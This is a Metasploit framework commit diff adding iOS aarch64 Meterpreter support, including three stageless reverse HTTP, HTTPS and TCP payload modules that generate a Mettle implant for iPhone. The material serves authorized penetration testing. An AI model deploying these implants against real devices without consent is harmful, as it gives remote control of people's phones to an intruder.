iOS meterpreter

timwr · timwr · commit c4e20e01e315 · 2017-12-12T23:23:21.000+08:00
diff --git a/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb b/lib/msf/base/sessions/meterpreter_aarch64_apple_ios.rb
@@ -0,0 +1,29 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_aarch64_Apple_iOS < Msf::Sessions::Meterpreter
+  def supports_ssl?
+    false
+  end
+  def supports_zlib?
+    false
+  end
+  def initialize(rstream, opts={})
+    super
+    self.base_platform = 'apple_ios'
+    self.base_arch = ARCH_AARCH64
+  end
+end
+
+end
+end
+
diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb
@@ -560,4 +560,12 @@ class Hardware < Msf::Module::Platform
     Alias = "hardware"
   end
 
+  #
+  # Apple iOS
+  #
+  class Apple_iOS < Msf::Module::Platform
+    Rank = 100
+    Alias = "apple_ios"
+  end
+
 end
diff --git a/lib/msf/core/payload/uuid.rb b/lib/msf/core/payload/uuid.rb
@@ -72,7 +72,8 @@ class Msf::Payload::UUID
     21 => 'python',
     22 => 'nodejs',
     23 => 'firefox',
-    24 => 'r'
+    24 => 'r',
+    25 => 'apple_ios',
   }
 
   # The raw length of the UUID structure
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
@@ -30,7 +30,7 @@ def initialize(info = {})
             'BadChars'    => '',
             'DisableNops' => true
           },
-        'Platform'       => %w[android bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
+        'Platform'       => %w[android apple_ios bsd java js linux osx nodejs php python ruby solaris unix win mainframe multi],
         'Arch'           => ARCH_ALL,
         'Targets'        => [ [ 'Wildcard Target', {} ] ],
         'DefaultTarget'  => 0,
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'http',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse HTTPS Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseHttps,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'https',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
+
+module MetasploitModule
+
+  include Msf::Payload::Single
+  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MettleConfig
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Apple_iOS Meterpreter, Reverse TCP Inline',
+        'Description'   => 'Run the Meterpreter / Mettle server payload (stageless)',
+        'Author'        => [
+          'Adam Cammack <adam_cammack[at]rapid7.com>',
+          'Brent Cook <brent_cook[at]rapid7.com>',
+          'timwr'
+        ],
+        'Platform'      => 'apple_ios',
+        'Arch'          => ARCH_AARCH64,
+        'License'       => MSF_LICENSE,
+        'Handler'       => Msf::Handler::ReverseTcp,
+        'Session'       => Msf::Sessions::Meterpreter_aarch64_Apple_iOS
+      )
+    )
+  end
+
+  def generate
+    opts = {
+      scheme: 'tcp',
+      stageless: true
+    }
+    MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec
+  end
+end
diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb
@@ -25,6 +25,7 @@
   ['x86',       'Linux', 'i486-linux-musl'],
   ['zarch',     'Linux', 's390x-linux-musl'],
   ['x64',       'OSX',   'x86_64-apple-darwin'],
+  ['aarch64',   'Apple_iOS',   'aarch64-iphone-darwin'],
 ]
 
 arch = ''
@@ -42,7 +43,7 @@
 
     template = File::read(File::join(cwd, "meterpreter_reverse.erb"))
     renderer = ERB.new(template)
-    filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb")
+    filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb")
     File::write(filename, renderer.result())
   end
 end

Original file line number	Diff line number	Diff line change
`@@ -72,7 +72,8 @@ class Msf::Payload::UUID`
`72`	`72`	`21 => 'python',`
`73`	`73`	`22 => 'nodejs',`
`74`	`74`	`23 => 'firefox',`
`75`		`- 24 => 'r'`
	`75`	`+ 24 => 'r',`
	`76`	`+ 25 => 'apple_ios',`
`76`	`77`	`}`
`77`	`78`
`78`	`79`	`# The raw length of the UUID structure`